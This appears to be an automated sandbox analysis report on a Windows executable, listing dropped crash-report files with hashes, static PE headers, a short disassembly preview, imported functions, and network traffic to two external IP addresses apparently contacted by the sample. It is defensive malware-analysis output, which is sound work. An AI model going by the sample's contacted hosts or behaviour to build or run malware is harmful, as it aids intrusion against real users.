Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4603
Entropy (8bit):	4.503430342432637
Encrypted:	false
SSDEEP:	48:cvIwSD8zszJgtWI9BdWgc8sqYjQ8fm8M4Jd/9PZFWMP+q8G1B9p8gd:uITfNesgrsqYRJZ1aMP3r9p8gd
MD5:	B00FB0FA9CBDD2DD7436E631B91F33D0
SHA1:	5AFDC4BFC0AB2ABD96D8697465BEFA9EAA32D389
SHA-256:	8DEBBB6EB2347B5A56EFBB016950133749345DE9B2707D10F1118E0E016CF2B7
SHA-512:	6D7AE8B5A68B2EEB129E855CC13664C699A2506DDCD2361B543E3819F7CDB512357E0A6D3FBA61F8ED4E35E75B9C9ECA83B11FF26D7CC2049EF7557DEB9E0EDB
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1527024" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\Microsoft\Windows\WER\Temp\WEREC1D.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Mon May 23 01:14:12 2022, 0x1205a4 type
Category:	dropped
Size (bytes):	64300
Entropy (8bit):	2.360542612045776
Encrypted:	false
SSDEEP:	192:st/LsPLLxEGnOEaKOKluEePdtRO2UN/Na5H59PbblOuzyQCXu25/zDK/jJ5JyUAT:LEGOEYH5lt0bNla5Hjbk6FkrcN/yUwT
MD5:	D19F1EA4C134AB67499FC819F7D4785B
SHA1:	7E1E43E8E0CC523006FE184243B5F730DAD1CB21
SHA-256:	1EDDD8AF5551D56DFA54146C706AD65E2E06B5A87D917F8B385DA641EDAF46B6
SHA-512:	33AC00199636347C469246D617660721D471CA49D8B03F18123D10B7CFAB217EE55BD1A9076E7C5BF6AB74CA796AE45D921D86A1839CDF72BE8A0A2408BC1984
Malicious:	false
Preview:	MDMP....... .........b....................................D....(..........T.......8...........T...............t............................................................................................U...........B......h.......GenuineIntelW...........T.......x.....b.............................0..2...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WEREF3B.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8326
Entropy (8bit):	3.704887246712797
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNiJD6JG4hh6YW3SUYRhxgmfTSxZiCpBI89bLmsfnyZm:RrlsNit60ch6Y2SUY3xgmfTSxzLFfnV
MD5:	E662A71B07BA62E35F7DF60860F21B41
SHA1:	87865BA490764044CC78106330CF6C82F0EB51BC
SHA-256:	6626B24EF563CFEECB86D91861BA1CEC3343DF2978F052ADDA76F01539CBB882
SHA-512:	A7C4141CB4C90F995BBD4E663AA45F7BD72F3B144DCBFECAC2C58259DACBC1C6173A864A854E54F4C8CD680182F1A673248A09D3B4D5B35D908DDC58E459479C
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.3.2.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF074.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4603
Entropy (8bit):	4.50253285591967
Encrypted:	false
SSDEEP:	48:cvIwSD8zszJgtWI9BdWgc8sqYj48fm8M4Jd/9PZF5+q8G1B9p8gd:uITfNesgrsqYpJZ1F3r9p8gd
MD5:	EA29A9B903CB14C135C7CD540289342F
SHA1:	D7C44A3A82D4097E66949DD1C48BDD5F61490E11
SHA-256:	7D8EEA4121AEDA976AC25584B14CDF25B1A5C1F8E0AEBDAA5D726375CE2672BA
SHA-512:	9E2911339B942357801A162045A6A05AB3CE941C577418AA3BDD2950EDF6074D9EC6D9B766B3BBA724A6B9D2FE2820134F73E35B2E0F0974191BC6DA4E20BA8E
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1527024" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF96B.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Mon May 23 01:14:15 2022, 0x1205a4 type
Category:	dropped
Size (bytes):	76548
Entropy (8bit):	2.194494302598036
Encrypted:	false
SSDEEP:	384:0NDEWx6lg7gCea5ejbk6fHdcN/sVAp3k:09EHlg7kPk6vdcGS3k
MD5:	A8987B61A3227ED62D5AD02C69779363
SHA1:	0EDAE1C93BA67DB5FC79254644187AFEF345AC27
SHA-256:	6EB850244A45BDB70420E90B4F1F4C56DD2BE4FE98ED8158F9C8135444D5F9B1
SHA-512:	958BFE91CAB35A869FDDAD5CA8A0E13D374C0D06FD12787EBEEE011026352CD93CB579D6DE9D745C1350B936930541B6DBC95E990041F654F7DD9B17BA41F8B5
Malicious:	false
Preview:	MDMP....... .........b............$...............,.......................T.......8...........T...........8...............D...........0....................................................................U...........B..............GenuineIntelW...........T.......x.....b.............................0..2...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERFBFC.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8338
Entropy (8bit):	3.7083048557892506
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNiJt6MJ6YWcSULRhgEgmfTSxZiCpB489bvmsfNlm:RrlsNiz6MJ6Y9SUL3zgmfTSxjvFfu
MD5:	F754F5CE7552E21440B2EB6A434909AD
SHA1:	DDE54A5FCCA87CD2E924F1061034AADE31A493D4
SHA-256:	52E61C7543BC144D85F0820081B637AFAB5530C5235AAB8FD508593161AD424F
SHA-512:	7FE6A6754DC3B1D9C45B9C56BFC9154E3985B0D89D6D617B3DC2E49EE17F570ADB27D7EF1A1D8A9EEBA18294750DB0E91E4B180528BD9E9F98B57C661CA6F435
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.3.2.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WERFD26.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4603
Entropy (8bit):	4.5027929159704545
Encrypted:	false
SSDEEP:	48:cvIwSD8zszJgtWI9BdWgc8sqYjJ8fm8M4Jd/9PZFc+q8G1B9p8gd:uITfNesgrsqYSJZ1Y3r9p8gd
MD5:	92ECEF3FE1B80DE18FF8D6AB719E4C12
SHA1:	77215623B48D5A92D9E0C62F9832C47A32D5EE4A
SHA-256:	616FAD9BDDEF61EAF91DBCDB744E08FE9230F2848C5594F7AAA70E2D6620EF8C
SHA-512:	C358553F738A81B8C052A66D303C3F8980AA7D9D68F7D56A1B29A5C290A39A72AF706978646B0DDF7ACA5C5842BC26113180E8D898C3C3BFA7155DFA52307CC9
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1527024" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

\Device\ConDrv

Download File

Process:	C:\Users\user\Desktop\xw0K5Lahxz.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	150
Entropy (8bit):	3.0049355947431313
Encrypted:	false
SSDEEP:	3:SXKPFpgqPFjKPFCaPFpgqPFjKPFCaPFpgqPFjKPFCaPFpgqPFjKPFCaPFpgqPFjU:SuFpDPF2PFTPFpDPF2PFTPFpDPF2PFTT
MD5:	C002780BDCB8D36218FA798C25691F4D
SHA1:	D6FF2424ED9316AD1FC9832AC3484C0E060480DB
SHA-256:	55C5E3A2EECE6F7AD35BC80B6A5B9744DC9445534487F436BBD6FE7694D905F6
SHA-512:	C5CD9CA0A6D72F79AF27BF1FBE9707F5C820C3183600DDD62073EA00F32FDCEF3020C4429D5692C6EED180DD3484B8750429A5E14080154F4304E1B217950ECD
Malicious:	false
Preview:	Error: 1..Error: 2..Error: 3..Error: 1..Error: 2..Error: 3..Error: 1..Error: 2..Error: 3..Error: 1..Error: 2..Error: 3..Error: 1..Error: 2..Error: 3..

Static File Info

General

File type:	PE32 executable (console) Intel 80386, for MS Windows
Entropy (8bit):	6.568271788822797
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	xw0K5Lahxz.exe
File size:	311808
MD5:	7915148540e7809fe683781541c1d4ed
SHA1:	cb67a77fff16b5d1db734f554806a749ac929c8a
SHA256:	310920ced8b5866693fe7947bb0e2b87618a4c5500d5c540b830c7abd470aa3f
SHA512:	d0cdae6fed9b6f27e0e1cef6b21844337ff78d5f113a215803b78d88076788e1b82a4181d3bacf5c6125c52125f69ce24ebc5f58e5e60e4c57fa0bacc2e32245
SSDEEP:	6144:7Dq+Wrb363M2r0ZoUEyeYBKc50duqqqKG91E0skOD:72JTkMo5yeY8ceuqqqKGBskg
TLSH:	1A647D10BA90E035F5BF11F885798368B92A7EA16B2450CB72F97AEE57346D0EC30717
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........a&...u...u...uB..u...u...u...u...uy..u...u...u. tu...u...u!..u...u...u...u...u...u...uRich...u........................PE..L..

File Icon


Icon Hash:	9066e190e6673146

Static PE Info

General

Entrypoint:	0x40ab90
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x619C9620 [Tue Nov 23 07:20:00 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	0588ee478c2f970a1d27d379ec7f0453

Entrypoint Preview

Instruction
mov edi, edi
push ebp
mov ebp, esp
call 00007F36311C625Bh
call 00007F36311BC476h
pop ebp
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
mov edi, edi
push ebp
mov ebp, esp
push FFFFFFFEh
push 0042E110h
push 004132A0h
mov eax, dword ptr fs:[00000000h]
push eax
add esp, FFFFFF94h
push ebx
push esi
push edi
mov eax, dword ptr [00430108h]
xor dword ptr [ebp-08h], eax
xor eax, ebp
push eax
lea eax, dword ptr [ebp-10h]
mov dword ptr fs:[00000000h], eax
mov dword ptr [ebp-18h], esp
mov dword ptr [ebp-70h], 00000000h
mov dword ptr [ebp-04h], 00000000h
lea eax, dword ptr [ebp-60h]
push eax
call dword ptr [00401250h]
mov dword ptr [ebp-04h], FFFFFFFEh
jmp 00007F36311BC488h
mov eax, 00000001h
ret
mov esp, dword ptr [ebp-18h]
mov dword ptr [ebp-78h], 000000FFh
mov dword ptr [ebp-04h], FFFFFFFEh
mov eax, dword ptr [ebp-78h]
jmp 00007F36311BC5B7h
mov dword ptr [ebp-04h], FFFFFFFEh
call 00007F36311BC5F4h
mov dword ptr [ebp-6Ch], eax
push 00000001h
call 00007F36311C6C4Ah
add esp, 04h
test eax, eax
jne 00007F36311BC46Ch
push 0000001Ch
call 00007F36311BC5ACh
add esp, 04h
call 00007F36311C3644h
test eax, eax
jne 00007F36311BC46Ch
push 00000010h

Rich Headers

Programming Language:

[ C ] VS2008 build 21022
[LNK] VS2008 build 21022
[ASM] VS2008 build 21022
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[C++] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2e84c	0x28	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x80000	0xc358	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x1390	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x9220	0x18	.text
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x91d8	0x40	.text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x338	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x2eb8c	0x2ec00	False	0.426329587233	data	6.18378085312	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x30000	0x4fd3c	0x10e00	False	0.932942708333	data	7.78953206486	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x80000	0xc358	0xc400	False	0.443698182398	data	4.63529126013	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
AFX_DIALOG_LAYOUT	0x89ac8	0x2	data	Uzbek	Italy
AFX_DIALOG_LAYOUT	0x89ad0	0x2	data	Uzbek	Italy
RT_CURSOR	0x89ad8	0x130	data	Uzbek	Italy
RT_CURSOR	0x89c20	0x130	data	Uzbek	Italy
RT_CURSOR	0x89d50	0xf0	data	Uzbek	Italy
RT_CURSOR	0x89e40	0x10a8	dBase III DBT, version number 0, next free block index 40	Uzbek	Italy
RT_CURSOR	0x8af18	0x8a8	dBase III DBT, version number 0, next free block index 40, 1st item "\251\317"	Uzbek	Italy
RT_ICON	0x806d0	0x6c8	data	Uzbek	Italy
RT_ICON	0x80d98	0x568	GLS_BINARY_LSB_FIRST	Uzbek	Italy
RT_ICON	0x81300	0x10a8	data	Uzbek	Italy
RT_ICON	0x823a8	0x988	dBase III DBT, version number 0, next free block index 40	Uzbek	Italy
RT_ICON	0x82d30	0x468	GLS_BINARY_LSB_FIRST	Uzbek	Italy
RT_ICON	0x831e8	0xea8	data	Uzbek	Italy
RT_ICON	0x84090	0x8a8	dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 2498605, next used block 8434549	Uzbek	Italy
RT_ICON	0x84938	0x6c8	data	Uzbek	Italy
RT_ICON	0x85000	0x568	GLS_BINARY_LSB_FIRST	Uzbek	Italy
RT_ICON	0x85568	0x25a8	data	Uzbek	Italy
RT_ICON	0x87b10	0x10a8	data	Uzbek	Italy
RT_ICON	0x88bb8	0x988	data	Uzbek	Italy
RT_ICON	0x89540	0x468	GLS_BINARY_LSB_FIRST	Uzbek	Italy
RT_STRING	0x8b918	0x3ba	data	Uzbek	Italy
RT_STRING	0x8bcd8	0x562	data	Uzbek	Italy
RT_STRING	0x8c240	0x118	data	Uzbek	Italy
RT_ACCELERATOR	0x89a58	0x70	data	Uzbek	Italy
RT_ACCELERATOR	0x89a20	0x38	data	Uzbek	Italy
RT_GROUP_CURSOR	0x89c08	0x14	data	Uzbek	Italy
RT_GROUP_CURSOR	0x8aee8	0x30	data	Uzbek	Italy
RT_GROUP_CURSOR	0x8b7c0	0x14	data	Uzbek	Italy
RT_GROUP_ICON	0x899a8	0x76	data	Uzbek	Italy
RT_GROUP_ICON	0x83198	0x4c	data	Uzbek	Italy
RT_VERSION	0x8b7d8	0x13c	data	Uzbek	Italy

Imports

DLL

Import

KERNEL32.dll

GetFileSize, WriteConsoleInputW, TryEnterCriticalSection, WritePrivateProfileStructA, GetConsoleAliasesLengthW, CopyFileExW, GetModuleHandleExA, GetConsoleAliasExesA, SetComputerNameExA, GetDriveTypeW, MoveFileExA, DebugActiveProcessStop, lstrcpynA, GetConsoleAliasExesLengthA, FindResourceW, BuildCommDCBAndTimeoutsA, LoadResource, UpdateResourceA, InterlockedIncrement, _lwrite, GetQueuedCompletionStatus, VerSetConditionMask, ReadConsoleA, InterlockedDecrement, ZombifyActCtx, SetDefaultCommConfigW, GetSystemWindowsDirectoryW, GetNamedPipeHandleStateA, GetProfileSectionA, SetConsoleScreenBufferSize, InterlockedCompareExchange, WriteConsoleInputA, GetComputerNameW, GetModuleHandleW, GetTickCount, GetConsoleAliasesLengthA, GetDllDirectoryW, GetPrivateProfileStringW, GetConsoleTitleA, ReadConsoleOutputA, GetDateFormatA, GetCommandLineA, CreateActCtxW, EnumResourceTypesA, SetProcessPriorityBoost, GetDriveTypeA, GetPriorityClass, GetPrivateProfileIntA, GetSystemDirectoryW, CopyFileW, AssignProcessToJobObject, GetCalendarInfoA, ReadProcessMemory, GetSystemWow64DirectoryW, SetSystemTimeAdjustment, GetSystemWindowsDirectoryA, FormatMessageW, GetVersionExW, GetFileAttributesA, SetConsoleMode, GetConsoleAliasW, GetWriteWatch, VerifyVersionInfoA, GetBinaryTypeA, WritePrivateProfileSectionW, TerminateProcess, GetAtomNameW, GetMailslotInfo, GetCompressedFileSizeA, GetTimeZoneInformation, CreateFileW, GetOverlappedResult, GetACP, lstrcmpW, GetVolumePathNameA, lstrlenW, FindNextVolumeMountPointW, CreateMailslotW, DisconnectNamedPipe, DeactivateActCtx, GetNamedPipeHandleStateW, GetConsoleAliasesW, ReleaseActCtx, SetCurrentDirectoryA, GetStartupInfoA, GetCPInfoExW, FillConsoleOutputCharacterW, GetHandleInformation, GetLastError, GetLongPathNameW, ReadConsoleOutputCharacterA, CreateNamedPipeA, EnumDateFormatsExA, CreateTimerQueueTimer, WriteProfileSectionA, SetComputerNameA, VerLanguageNameW, GlobalGetAtomNameA, DefineDosDeviceA, ResetEvent, OpenWaitableTimerA, GetLocalTime, LoadLibraryA, WriteConsoleA, UnhandledExceptionFilter, InterlockedExchangeAdd, LocalAlloc, SetCalendarInfoW, WritePrivateProfileStringA, MoveFileA, SetConsoleOutputCP, GetExitCodeThread, AddAtomW, GetProfileStringA, HeapLock, GetCommMask, HeapWalk, GetTapeParameters, FoldStringA, SetSystemTime, GlobalWire, GetPrivateProfileSectionNamesA, GetOEMCP, FindNextFileA, EnumDateFormatsA, CreateIoCompletionPort, FindFirstChangeNotificationA, lstrcatW, FreeEnvironmentStringsW, FindNextFileW, GetStringTypeW, BuildCommDCBA, VirtualProtect, OutputDebugStringA, SetThreadAffinityMask, EndUpdateResourceA, CloseHandle, GetVersion, DeleteFileW, GetCurrentProcessId, MoveFileWithProgressW, GetFileInformationByHandle, DebugBreak, FindActCtxSectionStringW, SuspendThread, lstrcpyA, SetUnhandledExceptionFilter, WideCharToMultiByte, GetStartupInfoW, HeapValidate, IsBadReadPtr, RaiseException, Sleep, GetProcAddress, ExitProcess, GetModuleFileNameA, WriteFile, GetStdHandle, GetCurrentProcess, IsDebuggerPresent, GetModuleFileNameW, GetCPInfo, IsValidCodePage, TlsGetValue, TlsAlloc, TlsSetValue, GetCurrentThreadId, TlsFree, SetLastError, EnterCriticalSection, LeaveCriticalSection, RtlUnwind, DeleteCriticalSection, SetHandleCount, GetFileType, QueryPerformanceCounter, GetSystemTimeAsFileTime, GetEnvironmentStringsW, GetCommandLineW, HeapDestroy, HeapCreate, HeapFree, VirtualFree, HeapAlloc, HeapSize, HeapReAlloc, VirtualAlloc, InitializeCriticalSectionAndSpinCount, SetFilePointer, GetConsoleCP, GetConsoleMode, WriteConsoleW, OutputDebugStringW, LoadLibraryW, MultiByteToWideChar, LCMapStringA, LCMapStringW, GetStringTypeA, GetLocaleInfoA, SetStdHandle, GetConsoleOutputCP, FlushFileBuffers, CreateFileA, DeleteFileA, GetModuleHandleA

Version Infos

Description	Data
Translations	0x0294 0x0059

Possible Origin

Language of compilation system	Country where language is spoken	Map
Uzbek	Italy

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 22, 2022 18:14:20.149075985 CEST	49751	80	192.168.2.3	5.101.153.227
May 22, 2022 18:14:20.213071108 CEST	80	49751	5.101.153.227	192.168.2.3
May 22, 2022 18:14:20.213174105 CEST	49751	80	192.168.2.3	5.101.153.227
May 22, 2022 18:14:20.213428974 CEST	49751	80	192.168.2.3	5.101.153.227
May 22, 2022 18:14:20.276884079 CEST	80	49751	5.101.153.227	192.168.2.3
May 22, 2022 18:14:20.276971102 CEST	49751	80	192.168.2.3	5.101.153.227
May 22, 2022 18:14:20.340545893 CEST	80	49751	5.101.153.227	192.168.2.3
May 22, 2022 18:14:20.340595961 CEST	80	49751	5.101.153.227	192.168.2.3
May 22, 2022 18:14:20.340682030 CEST	49751	80	192.168.2.3	5.101.153.227
May 22, 2022 18:14:20.340945005 CEST	49751	80	192.168.2.3	5.101.153.227
May 22, 2022 18:14:20.404153109 CEST	80	49751	5.101.153.227	192.168.2.3
May 22, 2022 18:14:20.417181969 CEST	49752	80	192.168.2.3	107.161.23.150
May 22, 2022 18:14:23.575192928 CEST	49752	80	192.168.2.3	107.161.23.150
May 22, 2022 18:14:29.591366053 CEST	49752	80	192.168.2.3	107.161.23.150
May 22, 2022 18:14:41.978894949 CEST	49757	80	192.168.2.3	107.161.23.150
May 22, 2022 18:14:44.983234882 CEST	49757	80	192.168.2.3	107.161.23.150
May 22, 2022 18:14:50.983829021 CEST	49757	80	192.168.2.3	107.161.23.150
May 22, 2022 18:15:03.171363115 CEST	49773	80	192.168.2.3	107.161.23.150
May 22, 2022 18:15:06.188081980 CEST	49773	80	192.168.2.3	107.161.23.150
May 22, 2022 18:15:12.192435980 CEST	49773	80	192.168.2.3	107.161.23.150
May 22, 2022 18:15:24.382404089 CEST	49822	80	192.168.2.3	107.161.23.150
May 22, 2022 18:15:27.392991066 CEST	49822	80	192.168.2.3	107.161.23.150
May 22, 2022 18:15:33.409149885 CEST	49822	80	192.168.2.3	107.161.23.150
May 22, 2022 18:15:45.484868050 CEST	49858	80	192.168.2.3	107.161.23.150
May 22, 2022 18:15:48.488523960 CEST	49858	80	192.168.2.3	107.161.23.150
May 22, 2022 18:15:54.489031076 CEST	49858	80	192.168.2.3	107.161.23.150
May 22, 2022 18:16:06.733859062 CEST	49863	80	192.168.2.3	107.161.23.150
May 22, 2022 18:16:09.740391970 CEST	49863	80	192.168.2.3	107.161.23.150
May 22, 2022 18:16:15.740848064 CEST	49863	80	192.168.2.3	107.161.23.150

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 22, 2022 18:14:13.703377962 CEST	57723	53	192.168.2.3	8.8.8.8
May 22, 2022 18:14:13.723165035 CEST	53	57723	8.8.8.8	192.168.2.3
May 22, 2022 18:14:20.395705938 CEST	58116	53	192.168.2.3	8.8.8.8
May 22, 2022 18:14:20.415194035 CEST	53	58116	8.8.8.8	192.168.2.3
May 22, 2022 18:14:41.931665897 CEST	49873	53	192.168.2.3	8.8.8.8
May 22, 2022 18:14:41.951348066 CEST	53	49873	8.8.8.8	192.168.2.3
